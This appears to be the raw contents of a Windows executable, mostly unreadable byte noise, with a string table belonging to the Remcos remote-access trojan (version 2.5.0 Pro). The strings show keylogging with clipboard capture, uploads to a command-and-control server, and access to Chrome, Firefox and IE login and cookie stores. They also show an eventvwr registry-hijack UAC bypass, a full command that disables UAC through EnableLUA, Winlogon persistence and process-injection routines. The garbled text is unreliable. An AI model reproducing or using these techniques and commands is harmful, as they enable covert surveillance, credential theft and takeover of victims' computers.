>\PT Actx [IY- _P8\ SsHd, [IY-0 SsHd, SsHd, \a*p GsHd( GsHd( GsHd( SsHd, GsHd( Actx SsHd, GsHd( GsHd( GsHd( GsHd( ######$#########$###### ######$%&&&&&&%&&&&&&&&&%&&&&&& &&&&&&%&0 '('('('('('('('('($%'('(%'('('('('('('('(($%'('('($%'('('('('('('('('('(''('('(%($$%$%$$%$$$%%$$$$%$$%$'$%(($$%''($%$%$$%$%($%''($$$%$%$$%%)$%%%))))'*($+%$+%'('('('('('('('(%'(($+%'($$$%'('('(P '('('('($%$%$%$%$%$%$%$%$%$%$%$%$%$%%%%%%%$$%$$%%$%$$$$%$%$%$%$%%%%%%%%%%%%%%%%%%%%%%%%%(%%(%%%%%%%%)%%%%%%%%%%%,,,,,,,,,--.,.....-----/--//---/..------//////--,,,,.---------.-----------------P 0000000000000000000000000000000100000000111110000001111111111111$%$%--$% ,%%%" //'2''' ''($$$$$$$$$$$$$$$$$ $$$$$$$''(((((%%%%%%%%%%%%%%%%%%%%%%%%%((((($%%$''%%%$%$%$%$%%%%%$%3$%$$%%$$$ $'$'$$$'$$$$'$'$$$$$$$$$$'$$$$$$$$$$$$$$$$$$$$$$%%%%%%%%%(%%%%%%%(%(%%%(%%%%(%(%$%$%$%'($%$%$%$%$%40000011$%$%$%$%'($%$%'($%$%$%$%$%$%$%$%'($%$%'($%$%$%$%$%$%'($'($%$%$%$%$%$%%'('($%'($%'('('($%'('('($%'($%'('('('($%'($%$%$% $%$% $$$$$$$$$$$$$$$$$$$$$$ ,566666 %%%%%%%%%%%%%%%%%%%%%%% 0000000000000000010000000000000000000000000007070070171 888888888888888888888888888 88877 9999 33:;;:<733111111111117 888888888888888=8888888888000000001111001>>>11 ??????????;@@7880888888888888888888878111111191001111AA113000188BBBBBBBBBB888::8 77777777777777 818888888888888800000000000 888888888000000000008 CCCCCCCCCC88888888888888888000000000AA3"""8 11D)))))))))))))))))))))))))))))))))))))) 0)EEE>>>>>>>>EEEE0 )0000 ))))))))))>>66FFFFFFFFFF6.) ))))) )))))))) )))))))))))))))))))))) ))))))) )))) 0)EEE>>>> EE0) )))>> FFFFFFFFFF))GGDDDDDD4 0 @ @ P ` p )))))) EEE>> )))) FFFFFFFFFF11)))1 ))))))))I )))))))))))))) ))))) 0)EEE>>>>> ))))) 0)E>E>>>> )))))) )))) )))))))))))) EE>EE EEE0 DDD333333G3 )))))))) )))))))))))))))))) ))))) )>>>EEEE >>>0 JJJJJJJ4 )))))))) )))))) ))))) 0)EEEEEEE EE>0 )))))))))) )EEE>>>> EEE0 DDDDDD 4)))))) )))))))))))))))))) )))))))) ))))))))) ))))))) EEE>>> EEEEEEEE )))))))))))))))))))I)I))))))))KILIILLLLLLM GIIIIIIKMMMMMMMM6FFFFFFFFFF66 )))) ))))))) )))I>II>>>>>> IIIII 000001 FFFFFFFFFF )4446666666666666664444400444444FFFFFFFFFFDDDDDDDDDD404040""""NN)))))))) )))))))))))))))))))) >>>>>>>>>>>>>1D>>000600)))) 11111111 111111111111111111111111111111111111 444444440444444 4466666 )))))))))))EE>>>>E>>>>10D00DD11)FFFFFFFFFF666666))))))EE>>))))111)EDD))EEDDDDD)))>>>>)))))))))))))1EE>>NNNNNN0)NFFFFFFFFFF 44$$$$$$ )))))))))))6) @ @ @ @ @ )))))))))) )))) )))))))))))))))))) @ @ @ @ @ @ @ @ @ @ @ @ @ ))))))))) )))) ))))))) )))) )))) ))))))) )))) ))))))))))))))) ))))))))@ @ @ @ P @ @ P @ @ p @ @ ))))))))))) 1466666666DDDDDDDDDDDDDDDDDDDD 3333333333 ))))) @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ )))))))))))))66)))))))) O))))))))))))))))))))))))))"" )))))))))))666))@ @ @ @ @ @ p @ @ @ @ ))))))))))))) ))))>>1 ))>>166 ))>> )))IIIIIIIIIIIIIIIIIPPE>>>>>>>EEEEEEEE1DD00000000000666)666G)0 FFFFFFFFFF JJJJJJJJJJ @ @ 0 """""""""""111Q )))I)))))))))))))))))))) )))))))))1) @ @ @ @ @ @ I)))))))))))))))>>>EEEE>>111 DD1DDDDDD000 ""FFFFFFFFFF)))))))))))))) EEEEEEEEEEEEEEEEE)))))))DD FFFFFFFFFF ""3333333333333333 @ @ )))))))>>EEE 66@ 1111D)))))))))))))))0E>>>>>E>EEEEE>EN))))))) 64444444444000000000444444444 11D))))))))))))))D11>>EE>>N @ @ ))))DDEEEEEE>1111111DD00 66666FFFFFFFFFF )))FFFFFFFFFF))))))))))))))......66@ @ %%%%%%%%%%%%......................(((((((((%%%%%%%%%%%%%)%%%%%%%%%%%%%%%%%%)))))11110000000000001111111 @ @ @ '('('(((((((%%$%'('('('('($%$%$%P ((((((((''''''''(((((( '''''' (((((((( '(((((((((((((( ((((((((********((((( ((''''*/R///((( ((''''*///(((( (('''' ///(((((((('''''/// ((''''*// OOOOOOOOOOO S9222222""TT""TT""""""""""OU V;;WWW"""2""""""""""2X"""""""""""""3""""""""""""O YYYYYYZ[\""RYYYYYYYYYYZ[\"" GGGGGGGGG]GGGGGGGGGGGG 33$3333$33%$$$%%$$$%3$333$$$$$333333$3$3$3$$$$G%$$$$%))))%33%%$$33333$%%%%3333%4 JJJJJJJJJJJJJ)))$%)))) @ @ 33[G3\\333333333 333333333""33333333333444444444444444444444444444444444444433333333334333333333333333333 3333333 33333333333 JJJJJJJJJJJJJJJJJJJJJJJJYYYYYYYYYYYYYYYYYYYY44444444444444JJJJJJ \333\\33\\333333333333333333\\330 33333333333333 33333333333343333333333333333 3333 3333 3333 333333333333 3333333333333333333 3333 3333333 3333333""""""""""""""JJJJJJJJJJJJJJ3 33333333 33333333333333 33333""3333 333333"""""""""" 333""""""""""""""""""""""333333333333333""""3333333333333333""33 33333 $$$$$$$$$$$$$$$ %%%%%%%%%%%%%%% $%$$$%%$%$%$%$$$ %$%%$%%%%%%%) $%$%%333333 """"J"" %%%%%% )))))) )))))))) ))))))) @ @ @ """""""""""""""""""""""""""""""-" 3333333333 333330 333333 333333333333 ^TT23)__""""TT""""33""""""""2"""3_________0000002`a`a`33___))"33 bbbbbbbbbbbcbcbcbcbcbcbcbcbcbcbcbcbbcbcbcbbbbbbccbccbccbccbccbbbbbbbbbbbbbbbbbbbbbbbbb ddeefgbhiiiiiiiiiiijijijijijijijijijijijijiijijijiiiiiijjijjijjijjijjiiiiiiiiiiiiiiiikikkiijkkjjjjlmnok ))))))))))) pppppppppppppppppppppppppppppppppppp)))))))))))))))))))))))))) 44DDDD4444444444kkkkkkkkkkkkkkkk 444444444444433 DDDDDDDDDD4444444444 3JJJJJJJJJJJJJJJ44444444444433344JJJJJJJJJJJJJJJ4444444444443333qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq 444444433334444444444444444444334444444444444443P ________________ ______ ____ @ @ @ @ @ @ @ @ )))))))))))))"""FFFFFFFFFF)) $%$%$%$%$%$%)0111" 00"-$%$%$%$% 0 @ @ P ` @ 3333333-----------$%$%$%$%$%$%$%%%$%$%$%$%$%$%$%)%%%%%%%%$%$%$$%$%$%$%$%-44$% ))))) ))1)))1))))1)))))))EE>>E3333 ))))"""" DD))))))))))))))))))DEEEEEEEEEEEEEEE0 66 !@ 0! @ @ @ @!P!@ @ `!p!p ))))))>>>>>000r6)))))))>>>>>>>>111DN )))))))))>>>>>>EE>>DD11 )))1))))))))1D FFFFFFFFFF 6666@ @ )))) @ @ @ @ @ @ @ @ @ @ P" ssssssssssssssss "tttttttttttttttt "DDDDDDDDDDDDDDDD "______________ ))))))))))) __________ #@ @ @ # %%%%%%% %%%%% 808888888888Z8888888888888 88888 888888888888 8888888888888`#p# 88888888888888"" 8888888888888888888888 888888888888:3 @$"""""""""" 0000000 "22"""""""""""""<"< "<""2"""""";""Zu33\ 2v;2 88888 88888888888888888888888 TTxyxTzTTT{|}|~ % %0%@%P%`%p% NSDS '!R# '5O= '1O^ '1Ob $ $ $ ( ( ( , , , 0 0 0 4 4 4 '1w1x1y1T1 111213141515161718191:1;1<1=1>1?1@1B1C1D1E1E1E1E1E1E1G1I1K1M1O1O1O1O1O1P1Q1R1R1R1R1R1R1S1V1 @ P ` p 0 @ P ` p ! !0!@!P!`! "0" @"P" 0#@# P#`# 0$@$P$ % %0%@%P%`%p% & &0& @&P&`&p& '0' @'P'`'p' ( (0(@(P(`(p( ) )0)@) P)`)p) * * 0*@* P*`* + + 0+@+P+`+p+ , , 0,@,P,`,p, -0-@- S0h2 |\<` [)w" 'eRf >?=;;Nkqqqqqqqqqqturrrrr p__\ [Zat rrrrrvuqqqqqqqqihjjkkkkjjia`hsqqqqqqqqt{xxxxxxxxaNNNNNn xxxxxxxx{uqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqrqrrrrrrssssttttttuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu}t|m uuuuuwwvwvwvyuuuuuuuva=2# #2=avuuuuuuuututtttttsy veTKLVfoqqqqqqqqqqqturrrrr~ oa^] \]co rrrrrvuqqqqqqqqqqpnmlkjiihblqqqqqqqqqqt{xxxxxxxxxjUNNQ xxxxxxxxx{uqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqrqrrrrrrssssttttttuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuv yurx uu}~uy u}~u} uuuuwwvvvvvyuuuuuuuuvoG& &Govuuuuuuuuututtttttsstvurrrqrqqqqqqqqqqqqqqturrrrrrrd][ZrrrrrYY[brrrrrrrvuqqqqqqqqqqqqqqqqqqpqqqqqqqqqqqqt|yyyyyyyyyyypgs zyyyyyyyyyy|uqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq?Y <`+n+,~b? Rc,7H IDO(Q 9R}zu /5Z dppi! $[8a @>-Ie ~~LL bcqj$ FTzw ~bIc =O

Mqypdx\egc /cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc $3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz #3R &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz h0jV Wz|9bF>o qtWi iQ`3] 2RWFM4 8c2J WKB_ /QEG- }+#RJ) #9Uu, 2E-Ie ~~LL bcqj$ FTzw ~bIc =O

g B3}? Xkz5 w&?) "Lr(e$ kSEm| e$R2 +x|l @O1$ 8$Oi! 1+a~ *;G$d AIKIH 4yR7h Ui#tY. !e#p `1tx 9k+u aIKEld% E-% aw$p9G KEBnP^- QP^] ('j.I ZJC6k :}2O C6:g 2s]: lB9a ^kKk x99' $]1#Y w#(' V[khaV E-%! ZJ@m QECu1 tOET 2.QU H8#8 t4QEy mlI_ N:~Ur vRV2e q[:]y KpC(YU0w #1'p *)Gg"5 Kyeo} x{8vF_ x{8vF_ aIKI[ E-% -mxk 5sV~Nm| m&i JVv7 1G)\;_ })*i u;eB JJZ( !IKI@ E-% :}2O @?OZ nS#q" SE,e C2rH 3gb( 7QX1l{ >V#:n< KSYnw$ z{V4 B$@B #/8P2 nQpT mQX7 lQX6 Ekd1 dbV, lQXs V5mx E-%! k^~# XJU2 "YVKa Uu ]# ZyF_ f);#H Jbv. d>tlQU JUTH 1-.8 djQY =(mZh MBA< ))i) J)i( F0r3 &&,C gy&] lBZ\m. 9cB& ME'6 JZJC IKE QEEq ucXV 7n?x6v *2-X kZARim 7tN] NQfuU pIGv E&8# ~ff< U-Ei 5FjF v<:# D2:L H$p9 7+iv'ufU L(cD'r #Eh]Nu g)Vg1 a q$LD$ K51n JD'/ XFD&W {U{k O^:{P tTVv ~_N}( Q@ E ;Tu=O W[gd " bx 7gv:c I,qc r2:R ET7K> 5)UQ" IwrOl ]ZSo ji5 }E-~ >QVt J)i+ ))i( aIKE : [,Sm t0FIdh wF%S )V6+p< ,e>h M_s= $:cF E?i V-{8o ))i) yABk= [.ShellClassInfo LocalizedResourceName @%windir%\System32\ieframe.dll,-12385 [LocalizedFileNames USA.gov.url @%systemroot%\system32\MCTRes.dll,-200016 GobiernoUSA.gov.url @%systemroot%\system32\MCTRes.dll,-200017 [.ShellClassInfo LocalizedResourceName @%systemroot%\system32\MCTRes.dll,-200005 [LocalizedFileNames RecordedTV.library-ms @@%SystemRoot%\system32\shell32.dll,-34615 ?h}U /#86 {ck%v {ck%v {ck%v {ck%v {ck%v 8q@F m2DF 0_FF tcJ< ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu ]pGu {J`4 vzL r?%G @`=G ?Ep&P sf"d !mj?%H %$BVdH _+iH 4Y+@Z 1V KT/. e@-G Nf t /YaX :10J :10J :10J :10J :10J :10J :10J :10J Q+BJ Q+BJ Q+BJ Q+BJ Q+BJ j;"k. 4pzq 4pzq 4pzq 4pzq ;kkw= a^kKK "ryxiw V#"d ytCF v}z0 l4j.EL 5&^v 9fbEf 9fbEg 9fbEh 9fbEi 9fbEj 9fbEk 9fbEl 9fbEm 9fbEn 9fbEo 9fbEp 9fbEq 9fbEr 9fbEs 9fbEt 9fbEu 9fbEv VN]$D{ VN]$D{ 4E,M F@ hp`A PhdFA hp`A hp`A hp`A E8PW QQSVW VVSh~Q@ VVSh^Q@ VVSh 8Ft'WW t(Ht _^[] ^0Sh t@SW 8^"u:F XPVSS %xCA %`CA %\CA %4CA %$CA % CA %8BA %0EA %8EA %HEA % subscript FreeFrame GetFrame CloseCamera OpenCamera |dmc| [DataStart] %02i:%02i:%02i:%03i [INFO] KeepAlive Enabled! Timeout: %i seconds KeepAlive Timeout changed to %i [WARNING] KeepAlive Disabled! %02i:%02i:%02i:%03i [WARNING] Timeout expired, resetting connection. CloseChat GetMessage DisplayMessage SystemDrive cmd.exe eventvwr.exe origmsc mscfile\shell\open\command Software\Classes\mscfile\shell\open\command SOFTWARE\Microsoft\Windows NT\CurrentVersion CurrentBuildNumber [INFO] Uploading file to C&C: Unable to delete: Deleted file: Unable to rename file! Failed to download file: Downloaded file: Downloading file: Browsing directory: Executing file: [ERROR] Failed to upload file: Uploaded file: Offline Keylogger Started { User has been idle for minutes } Online Keylogger Started Online Keylogger Stopped Offline Keylogger Stopped [%04i/%02i/%02i %02i:%02i:%02i [F7] [F8] [F9] [F10] [F11] [F12] [F6] [Del] [F1] [F2] [F3] [F4] [F5] [Print] [End] [Start] [Left] [Up] [Right] [Down] [PagDw] [BckSp] [Tab] [Enter] [Pause] [Esc] [PagUp] [Ctrl + V] [Following text has been pasted from clipboard:] [End of clipboard text] [Ctrl + [LCtrl] [RCtrl] [Following text has been copied to clipboard:] [End of clipboard text] [Chrome StoredLogins found, cleared!] [Chrome StoredLogins not found] UserProfile \AppData\Local\Google\Chrome\User Data\Default\Login Data [Chrome Cookies found, cleared!] [Chrome Cookies not found] \AppData\Local\Google\Chrome\User Data\Default\Cookies [Firefox StoredLogins Cleared!] \key3.db \logins.json [Firefox StoredLogins not found] \AppData\Roaming\Mozilla\Firefox\Profiles\ [Firefox cookies found, cleared!] \cookies.sqlite [Firefox Cookies not found] [IE cookies cleared!] [IE cookies not found] Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Cookies Cleared browsers logins and cookies. [Cleared browsers logins and cookies.] FunFunc exepath Userinit C:\WINDOWS\system32\userinit.exe Shell explorer.exe Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ Normal Access level: Administrator licence (32 bit) (64 bit) ProductName Remcos_Mutex_Inj Software\ licence_code.txt SetProcessDEPPolicy Shell32 IsUserAnAdmin GetComputerNameExW IsWow64Process kernel32 kernel32.dll GlobalMemoryStatusEx GetModuleFileNameExW Kernel32.dll Psapi.dll GetModuleFileNameExA SETTINGS 2.5.0 Pro override C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f GetDirectListeningPort StopReverse StopForward StartReverse StartForward Mutex_RemWatchdog Watchdog launch failed! Watchdog module activated Remcos restarted by watchdog! [regsplt] HKCC HKCR HKCU HKLM Shlwapi.dll SHDeleteKeyW Disconnected! name %I64u Connected to Connecting to PowrProf.dll SetSuspendState SeShutdownPrivilege Temp ntdll.dll NtUnmapViewOfSection User32.dll GetCursorInfo DISPLAY alarm.wav [ALARM] Alarm has been triggered! close audio stop audio stopped status audio mode resume audio pause audio play audio GetLastInputInfo %02i:%02i:%02i:%03i GetSystemTimes abcdefghijklmnopqrstuvwxyz user Software\Microsoft\Windows\CurrentVersion\Uninstall TileWallpaper WallpaperStyle Control Panel\Desktop Remcos GetConsoleWindow MsgWindowClass Close * BreakingSecurity.Net * Remcos v CONOUT$ ExitThread CloseHandle WriteFile CreateFileW CreateDirectoryW Sleep GetModuleFileNameW CreateThread WaitForSingleObject CreateEventA GetLocalTime HeapFree HeapCreate SetEvent TerminateProcess ReadFile PeekNamedPipe CreateProcessA CreatePipe FindNextFileW FindFirstFileW lstrlenA GetDriveTypeA SetFilePointer GetFileSize DeleteFileW GetFileAttributesW GetLogicalDriveStringsA FindClose TerminateThread SetFileAttributesW RemoveDirectoryW MapViewOfFileEx CreateFileMappingA GetProcAddress LoadLibraryA GetLastError DeleteFileA FindNextFileA FindFirstFileA ExpandEnvironmentStringsA CopyFileW CreateMutexA OpenMutexA GetModuleHandleA Process32NextW Process32FirstW CreateToolhelp32Snapshot SizeofResource LockResource LoadResource FindResourceA GetLocaleInfoA OpenProcess GetCurrentProcessId lstrcatW GetTempFileNameW GetTempPathW GetTickCount GlobalUnlock GlobalLock GlobalAlloc GetCurrentProcess ResumeThread SetThreadContext WriteProcessMemory VirtualAllocEx ReadProcessMemory GetThreadContext VirtualAlloc CreateProcessW GlobalFree LocalAlloc DuplicateHandle GetCurrentThread GetLongPathNameW lstrcpynA GetModuleFileNameA ExitProcess AllocConsole KERNEL32.dll DispatchMessageA TranslateMessage GetMessageA GetKeyboardLayout SetWindowsHookExA CallNextHookEx GetKeyState GetWindowTextA GetWindowTextLengthA GetForegroundWindow UnhookWindowsHookEx CloseClipboard GetClipboardData OpenClipboard SetForegroundWindow SetWindowTextW ShowWindow SetClipboardData EmptyClipboard ExitWindowsEx MessageBoxW GetKeyboardLayoutNameA GetWindowThreadProcessId CloseWindow IsWindowVisible GetWindowTextW EnumWindows DrawIcon GetIconInfo mouse_event SendInput SystemParametersInfoW CreateWindowExA RegisterClassExA AppendMenuA CreatePopupMenu TrackPopupMenu GetCursorPos DefWindowProcA USER32.dll GetDIBits GetObjectA StretchBlt SelectObject DeleteObject DeleteDC CreateCompatibleBitmap GetDeviceCaps CreateCompatibleDC CreateDCA GDI32.dll RegDeleteKeyA RegOpenKeyExA RegCloseKey RegQueryValueExA RegQueryValueExW RegOpenKeyExW RegSetValueExA RegCreateKeyA RegSetValueExW RegCreateKeyW RegDeleteValueW RegEnumValueW RegEnumKeyExW RegQueryInfoKeyW RegCreateKeyExW AdjustTokenPrivileges LookupPrivilegeValueA OpenProcessToken CloseServiceHandle QueryServiceConfigW OpenServiceW EnumServicesStatusW OpenSCManagerA StartServiceW OpenSCManagerW ControlService QueryServiceStatus ChangeServiceConfigW GetUserNameW RegEnumKeyExA ADVAPI32.dll ShellExecuteW ShellExecuteExA Shell_NotifyIconA ExtractIconA SHELL32.dll ??2@YAPAXI@Z _ftol atoi strftime localtime time ??0exception@@QAE@ABV0@@Z _CxxThrowException ??3@YAXPAX@Z __CxxFrameHandler _EH_prolog free malloc strncmp printf getenv exit _wrename wcscmp tolower sprintf toupper _wgetenv wcslen wcscpy _wsystem swprintf rand srand _itow wcscat freopen _iob __dllonexit _onexit MSVCRT.dll ??1type_info@@UAE@XZ _exit _XcptFilter _acmdln __getmainargs _initterm __setusermatherr _adjust_fdiv __p__commode __p__fmode __set_app_type _except_handler3 _controlfp ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??0logic_error@std@@QAE@ABV01@@Z ??0out_of_range@std@@QAE@ABV01@@Z ??1out_of_range@std@@UAE@XZ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z ?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ ??0Init@ios_base@std@@QAE@XZ ??1Init@ios_base@std@@QAE@XZ ??0_Winit@std@@QAE@XZ ??1_Winit@std@@QAE@XZ ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z 